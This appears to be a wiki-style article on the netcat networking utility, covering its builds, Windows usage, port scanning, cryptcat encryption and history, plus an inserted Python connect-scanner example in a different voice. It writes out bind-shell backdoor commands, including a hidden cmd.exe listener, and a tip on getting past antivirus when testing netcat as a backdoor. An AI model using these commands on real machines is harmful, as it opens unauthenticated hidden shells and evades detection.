Netcat

From Free Knowledge Base- The DUCK Project: information for everyone

Netcat has been described as "a buffed up version of telnet that has many options that allow it to do many things" and "the TCP/IP swiss army knife." Some erroneously label it a hacker's tool, while many consider it a network engineer's right hand.

An article describing Netcat usage:

The original version of netcat was written for UNIX. Another version exists which is a rewrite, called GNU netcat.

  • Original UNIX netcat
  • GNU netcat
  • Cryptcat
  • Socat

note: Unless compiled with the "GAPING_SECURITY_HOLE" define, netcat cannot execute other programs: the -e option (hand an accepted connection to a program) only exists in such builds. Without it, netcat is harmless to have on your system in the sense that it can only move data in and out of a host; it cannot wire a connection to a shell.

The netcat feature most likely to be abused is the combination of listening as a server with -e, which hands each accepted connection to another program. Drop a copy of netcat (built with GAPING_SECURITY_HOLE) onto a host, or call it from any program you write, and execute:

   nc -l -p <port-number> -e /bin/sh

and anyone who can reach that port has an unauthenticated shell running as the user who started netcat: a bind-shell backdoor. Without -e the same command is only a listener that prints whatever arrives on the port.

Symantec detecting Netcat as a "hack tool"

12/15/05 - Symantec is now detecting Netcat as HackTool.NetCat. The default action of Norton AntiVirus is to delete the program so be careful that it doesn't get removed. Netcat is no more an attack tool than any file transfer or remote access program. It does not exploit any vulnerability, contain any malicious code, or attempt to hide its presence. It is ironic that Symantec lists netcat on their own security tools library where it is described as, "Windows NT/9x Netcat is the port of the simple Unix utility which reads and writes data across network connections, using TCP or UDP transport protocols."

If you are testing netcat as a backdoor and the antivirus signature gets in the way, one workaround is cryptcat: a separate build of netcat whose traffic is additionally encrypted, so the session contents are not visible to network inspection either.

"Cryptcat is the standard netcat enhanced with twofish encryption."

 

netcat windows usage

  • Unzip the netcat archive and extract nc.exe
  • Copy nc.exe to C:\WINDOWS\System32 or C:\WINNT\System32 (any directory on the PATH will do; this just makes "nc" callable from any prompt)

netcat works a lot like telnet. At the command prompt type:

nc <ip-address> <port>

Now as a server...

The following command will create a shell server on a Windows machine:

nc -L -d -p 2003 -t -e cmd.exe

This hands a cmd.exe command shell to whoever connects to port 2003. There is no authentication: the shell runs with the rights of the account that started nc.exe, and because of -L the server keeps listening after the client disconnects.

-L - "listen harder": stay open and re-listen after each connection closes (plain -l exits after one connection)
-d - detach from the console (don't open up a window when listening / stay hidden)
-p - listen on the specified port
-t - answer telnet option negotiation, so a plain telnet client can connect cleanly
-e cmd.exe - run cmd.exe with its input and output wired to the connection (only present in builds compiled with GAPING_SECURITY_HOLE)

 

port scanning

Make netcat try connecting on every port within a range:

nc -v -w 2 -z target 20-30

The -z switch prevents sending any data to a TCP connection and sends only very limited probe data to a UDP connection, so it works as a fast scanning mode just to see which ports the target is listening on. -w 2 caps each probe at two seconds, and -v is needed to see the per-port results, which go to stderr; without it -z prints nothing. To slow the scan down, -i secs inserts a delay between each port probe. Note that this is a full connect scan: every open port sees a completed TCP handshake, so the scan shows up in the target's logs. Port scanning is not netcat's strength; a tool such as nmap is better suited for it.
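To make concrete what the three outcomes of a `-z` probe look like from the scanner's side, here is an added example in Python; it is not code from this page or from netcat. It performs the same per-port TCP connect that `-z` does (handshake, no data), applies a `-w`-style timeout and an `-i`-style delay, expands netcat-style port arguments such as `20-30`, and classifies each port as open (handshake completed), closed (RST back) or filtered (no answer). The demo target it scans is constructed on localhost; the function names are my own.

```python
"""Connect scan in the style of `nc -v -w 2 -z target 20-30` (added example).

Not netcat's code: a pure-Python stand-in that shows what -z, -w and -i do and
how open, closed and filtered ports are told apart.  Names are my own.
"""
import socket
import time


def parse_ports(specs):
    """Expand netcat-style port arguments, e.g. ["20-30", "80"] -> [20..30, 80]."""
    ports = []
    for spec in specs:
        lo, sep, hi = spec.partition("-")
        if sep:
            ports.extend(range(int(lo), int(hi) + 1))
        else:
            ports.append(int(spec))
    return ports


def probe(host, port, timeout=2.0):
    """One `nc -z` style probe: returns "open", "closed" or "filtered".

    open     : three-way handshake completed (the server sees and may log it)
    closed   : the host answered the SYN with RST (ECONNREFUSED)
    filtered : nothing came back within `timeout` (-w), typically a firewall
               dropping the SYN, or the host/route was unreachable
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"  # connected, no data sent, socket closed: that is -z
    except ConnectionRefusedError:
        return "closed"
    except OSError:  # socket.timeout and network errors are OSError subclasses
        return "filtered"


def connect_scan(host, port_specs, timeout=2.0, delay=0.0):
    """Scan every port named in `port_specs` in order; `delay` mirrors nc -i."""
    results = {}
    for port in parse_ports(port_specs):
        if results and delay:
            time.sleep(delay)
        results[port] = probe(host, port, timeout)
    return results


def demo_local_scan():
    """Constructed demo target: one listening port and one port known to be
    free, both on localhost, scanned with a short -w style timeout.

    Returns (open_port, closed_port, results) so the caller can check both.
    """
    with socket.socket() as listener:
        listener.bind(("127.0.0.1", 0))
        listener.listen(5)
        open_port = listener.getsockname()[1]
        tmp = socket.socket()
        tmp.bind(("127.0.0.1", 0))
        closed_port = tmp.getsockname()[1]
        tmp.close()  # released: nothing listens there now
        results = connect_scan("127.0.0.1", [str(open_port), str(closed_port)],
                               timeout=1.0, delay=0.1)
    return open_port, closed_port, results


if __name__ == "__main__":
    open_port, closed_port, results = demo_local_scan()
    for port, state in sorted(results.items()):
        print(f"127.0.0.1 {port} {state}")
```

A "filtered" result is the one to be careful with: it only means no reply arrived before the timeout, so a short `-w` against a slow link will misreport open ports as filtered, which is one reason a dedicated scanner with retransmission logic is preferable for anything beyond a quick check.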

 

netcat encrypted

Cryptcat is the standard netcat enhanced with Twofish encryption (the block cipher designed by Bruce Schneier and colleagues). Linux, OpenBSD, FreeBSD, and Windows versions are available.

cryptcat = netcat + encryption

"Cryptcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol while encrypting the data being transmitted. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities."

Machine A: cryptcat -l -p 1234 < testfile
Machine B: cryptcat <machine A IP> 1234

Machine B prints the decrypted file to stdout; redirect it to a file to save it. Both ends must use the same key: cryptcat ships with a built-in default key ("metallica"), so set your own with -k on both sides. That shared key is the only access control on the session; the encryption keeps the contents off the wire in the clear but does nothing to authenticate who connects.

 

history

Hobbit (hobbit@avian.org) created netcat in 1995 as a feature-rich network debugging and exploration tool. Its purpose was to be able to create just about any type of network connection.

Some of the features of netcat are:

  • Outbound or inbound connections, TCP or UDP, to or from any ports
  • Full DNS forward/reverse checking, with appropriate warnings
  • Ability to use any local source port
  • Ability to use any locally-configured network source address
  • Built-in port-scanning capabilities, with randomizer
  • Built-in loose source-routing capability
  • Can read command line arguments from standard input
  • Slow-send mode, one line every N seconds
  • Optional ability to let another program service inbound connections

Some of the potential uses of netcat:

  • Script backends
  • Scanning ports and inventorying services
  • Backup handlers
  • File transfers
  • Server testing and simulation
  • Firewall testing
  • Proxy gatewaying
  • Network performance testing
  • Address spoofing tests
  • Protecting X servers
  • 1001 other uses you'll likely come up with

The original version of netcat was released to run on Unix and Linux. Weld Pond (weld@l0pht.com) released the Windows NT version in 1998. The source code is available for both versions.